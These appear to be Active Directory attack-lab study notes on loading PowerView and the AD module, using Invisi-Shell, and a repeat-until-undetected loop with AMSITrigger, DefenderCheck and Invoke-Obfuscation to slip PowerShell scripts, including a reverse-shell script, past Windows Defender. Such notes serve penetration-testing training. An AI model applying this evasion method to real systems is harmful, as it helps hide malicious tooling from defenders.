• Load a PowerShell script using dot sourcing:
. C:\AD\Tools\PowerView.ps1
• A module (or a script) can be imported with:
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1
• All the commands in a module can be listed with:
Get-Command -Module <modulename>
Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat
• With non-admin privileges:
RunWithRegistryNonAdmin.bat
• Type exit from the new PowerShell session to complete the clean-up.
Bypassing AV Signatures for PowerShell
Use tools like AMSITrigger and DefenderCheck to find out which part of the script Defender is detecting.
To obfuscate an entire script, use Invoke-Obfuscation.
AMSI Trigger
Steps to avoid signature-based detection are pretty simple:
1. Scan using AMSITrigger
2. Modify the detected code snippet
3. Rescan using AMSITrigger
4. Repeat steps 2 & 3 until the result is “AMSI_RESULT_NOT_DETECTED” or “Blank”
Simply provide the path to the script file to scan it:
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1